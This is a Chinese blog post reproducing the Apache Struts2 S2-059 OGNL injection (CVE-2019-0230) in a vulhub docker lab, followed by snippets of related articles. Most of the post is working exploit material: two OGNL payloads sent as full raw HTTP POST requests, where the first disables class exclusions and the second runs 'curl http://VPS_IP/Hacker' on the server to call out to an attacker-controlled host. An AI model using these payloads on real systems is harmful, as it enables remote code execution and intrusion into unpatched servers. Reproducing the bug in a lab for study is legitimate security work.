【vulhub】Struts2 S2-059 远程代码执行漏洞(CVE-2019-0230)

最新推荐文章于 2024-06-03 13:49:58 发布
最新推荐文章于 2024-06-03 13:49:58 发布
阅读量1k 收藏 2
点赞数
分类专栏: structs2 文章标签: struts 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42884199/article/details/121767042
版权

前言

Apache Struts框架, 会对某些特定的标签的属性值,比如id属性进行二次解析,所以攻击者可以传递将在呈现标签属性时再次解析的OGNL表达式,造成OGNL表达式注入。从而可能造成远程执行代码。

影响版本: Struts 2.0.0 - Struts 2.5.20

一、启动靶机

docker-compose build

docker-compose up -d

二、构造payload

view-source:http://192.168.150.146:8080/index.action?id=%25{(223*223)}

在这里插入图片描述
存在漏洞

三、漏洞利用

payload1:

%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}

先发送如下请求:
请求1:

POST /index.action HTTP/1.1
Host: 192.168.150.146:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: wordpress_test_cookie=WP+Cookie+check; cZZ_visitedfid=2; cZZ_sid=i4JJSc; JSESSIONID=node01muhk455eaqn41432r2whyt6ta0.node0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 195

id=%25{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}

在这里插入图片描述
payload2:

%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('curl http://VPS_IP/Hacker'))}

发送请求2:

POST /index.action HTTP/1.1
Host: 192.168.150.146:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: wordpress_test_cookie=WP+Cookie+check; cZZ_visitedfid=2; cZZ_sid=i4JJSc; JSESSIONID=node01muhk455eaqn41432r2whyt6ta0.node0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 195

id=%25{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('curl http://VPS_IP/Hacker'))}

在这里插入图片描述

四、验证

tail -n 1 -f /var/log/apache2/access.log

在这里插入图片描述

参考:

https://github.com/vulhub/vulhub/blob/master/struts2/s2-059/README.zh-cn.md

Crazy_Yu8
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-059CVE-2019-0230
qq_51577576的博客
12-14 612
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-059CVE-2019-0230漏洞产生的主要原因是因为Apache Struts框架在强制执行时,会对分配给某些标签属性(如id)的属性值执行二次ognl解析。攻击者可以通过构造恶意的OGNL表达式,并将其设置到可被外部输入进行修改,且会执行OGNL表达式的Struts2标签的属性值,引发OGNL表达式解析,最终造成远程代码执行的影响。
Struts2 S2-059 远程代码执行漏洞CVE-2019-0230 )复现
锋刃科技的博客
10-28 1927
简介 Struts2是一个基于MVC设计模式的Web应用框架 影响版本 Struts 2.0.0 – Struts 2.5.20 环境搭建 使用vulhub快速搭建 https://github.com/vulhub/vulhub 进入目录 cd vulhub-master/struts2/s2-059 docker安装 docker-compose up -d 启动环境之后访问http://your-ip:8080/?id=1就可以看到测试界面 漏洞...
【护网必备】最新Struts2全版本漏洞检测工具
最新发布
Fly_鹏程万里
06-03 827
运行工具后点击“检测漏洞”会自动检测该URL是否存在S2-001、S2-005、S2-009、S2-013、S2-016、S2-019、S2-020/021、S2-032、S2-037、DevMode、S2-045/046、S2-052、S2-048、S2-053、S2-057、S2-061、S2相关log4j2十余种漏洞。2、S2-020、S2-021仅提供漏洞扫描功能,因漏洞利用exp很大几率造成网站访问异常,本程序暂不提供。1、“批量验证”,(为防止批量geshell,此功能已经删除,并不再开发)
Apache Struts S2-059 远程代码执行漏洞(CVE-2019-0230)
08-24 1667
Struts2框架是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了Java ServletAPI,鼓励开发者采用MVC架构。Struts2WebWork优秀的设计思想为核心,吸收了Struts框架的部分优点,提供了一个更加整洁的MVC设计模式实现的Web应用程序框架。 漏洞简述 该漏洞编号为CVE-2019-0230漏洞等级:高危。攻击者可以通过构造恶意的OGNL表达式,并将其设置到可被外部输入进行修改,且会执行OGNL表达式的Struts2标签的属性值..
S2-059 远程代码执行漏洞(CVE-2019-0230)
EC_Carrot的博客
08-15 399
漏洞简介 影响版本: Struts 2.0.0 - Struts 2.5.20 详细请看:https://github.com/vulhub/vulhub/blob/master/struts2/s2-059/README.zh-cn.md 漏洞复现 我们用python来运行以下Poc,即可利用漏洞: import requests url = "http://127.0.0.1:8080" data1 = { "id": "%{(#context=#attr['struts.valueStack
Strtus2漏洞 - Struts2-052 Struts2-057 Struts2-059
HAKUNAMATATATTA的博客
12-29 776
S2-052 S2-057 S2-059漏洞复现过程
Struts2-059 远程代码执行漏洞CVE-2019-0230)分析
weixin_46236101的博客
10-14 3111
前言 2020年8月13日虽然近几年来关于ONGL方面的漏洞已经不多了,但是毕竟是经典系列的RCE漏洞,还是有必要分析的。而且对于Struts2和OGNL了解也有助于代码审计和漏洞挖掘。 首先了解一下什么是OGNL,Object Graphic Navigation Language(对象图导航语言)的缩写,Struts框架使用OGNL作为默认的表达式语言。 struts2_S2_059S2_029漏洞产生的原理类似,都是由于标签属性值进行二次表达式解析产生的,细微差别会在分析中提到。 漏洞利用前置条件是
Struts2 s2-032远程代码执行分析1
08-08
Struts2 s2-032 远程代码执行漏洞是一个严重的安全问题,涉及到的是Apache Struts2框架的一个核心功能,即动态方法调用。这个漏洞发生在2016年4月15日,被安恒安全研究院发现,并被CVE(Common Vulnerabilities and ...
CVE-2019-0230 s2-059 漏洞分析1
08-03
CVE-2019-0230 s2-059 漏洞分析 Apache Struts 框架中的 CVE-2019-0230 漏洞远程代码执行(RCE)漏洞,影响范围为 Struts 2.0.0 - Struts 2.5.20。官方建议升级到 2.5.22 或更高版本。该漏洞的成因是 Struts 框架...
[旧文系列] Struts2历史高危漏洞系列-part6:S2-059/S2-061
mole_exp的博客
01-18 1387
文章目录关于<旧文系列>前言S2-059漏洞复现与分析可回显PoC漏洞修复S2-061漏洞复现与分析可回显PoC漏洞修复小结Reference 关于<旧文系列> <旧文系列>系列是笔者将以前发到其他地方的技术文章,挑选其中一些值得保留的,迁移到当前博客来。 文章首发于奇安信攻防社区: https://forum.butian.net/share/601 https://forum.butian.net/share/602 https://forum.butian.net
struts2漏洞_Struts2 S2059远程代码执行漏洞CVE20190230
weixin_39989443的博客
12-10 249
作为一家专业的网络安全服务供应商,圣博润特别注重对最新安全漏洞的发现和追踪,以“及时性、准确性、层次性”为宗旨,为用户提供漏洞预警、通告及响应服务。一、Struts2简介Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts 2是Struts的下...
struts2 s2-059漏洞复现
黑白的博客
11-01 3771
声明 好好学习,天天向上 漏洞描述 struts2框架 2020年8月13日,Apache官方发布了一则公告,该公告称Apache Struts2使用某些标签时,会对标签属性值进行二次表达式解析,当标签属性值使用了%{skillName}并且skillName的值用户可以控制,就会造成OGNL表达式执行。 影响范围 Struts 2.0.0 – Struts 2.5.20 复现过程 可以下载中间件系列,使用docker搭建 https://github.com/vulhub/vulhub 下载完成后,我这
Struts2 S2-059漏洞复现-命令执行
帅醉了的博客
11-03 2649
Struts2 S2-059漏洞复现-命令执行 http://192.168.202.133:8080/?id=1把id=改成%25%7B233*233%7D 验证完毕 测试命令执行
s2-059漏洞复现
Birdman-one的博客
12-11 1279
s2-059 Struts2介绍 是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts 2是Struts的下一代产品,是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。其全新的Struts 2的体系结构与Struts 1的体系结构差别巨大。Struts 2以WebWork为核心,采用拦截器的机制来处理用户的请求,这样的设计也使得业务逻辑控
struts059-cve_2019_0230漏洞复现
0day
01-27 1675
struts059-cve_2019_0230漏洞复现 漏洞概述: 该漏洞编号为CVE-2019-0230漏洞等级:高危。攻击者可以通过构造恶意的OGNL表达式,并将其设置到可被外部输入进行修改,且会执行OGNL表达式的Struts2标签的属性值,引发OGNL表达式解析,最终造成远程代码执行的影响。 复现漏洞: 启动虚拟机,在docker中运行vulfocus镜像,通过浏览器访问,并下载struts059-cve_2019_0230镜像 启动漏洞环境,开始漏洞复现 打开漏洞..
描述**CVE**-2019-0232 Apache Tomcat远程代码执行漏洞
05-28
CVE-2019-0232是Apache Tomcat中的一个严重漏洞,可以允许攻击者通过特制的请求发送远程代码执行命令,从而控制Tomcat服务器。该漏洞由于存在于Tomcat中使用的Apache Commons FileUpload库中的一个漏洞,因此也被称为“Apache Commons FileUpload远程代码执行漏洞”。 攻击者可以构造一个特制的HTTP请求,该请求中包含恶意的JSP文件,并将该JSP文件传到Tomcat服务器上的一个目录中。一旦成功上传,攻击者可以通过直接访问该JSP文件来执行任意命令,包括获取服务器上的敏感数据或在服务器上执行其他恶意操作。 这个漏洞影响到Apache Tomcat 9.0.0.M1到9.0.17、8.5.0到8.5.39和7.0.0到7.0.93版本。Apache Tomcat官方已经发布了修复这个漏洞的补丁程序,建议用户尽快升级到最新版本。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值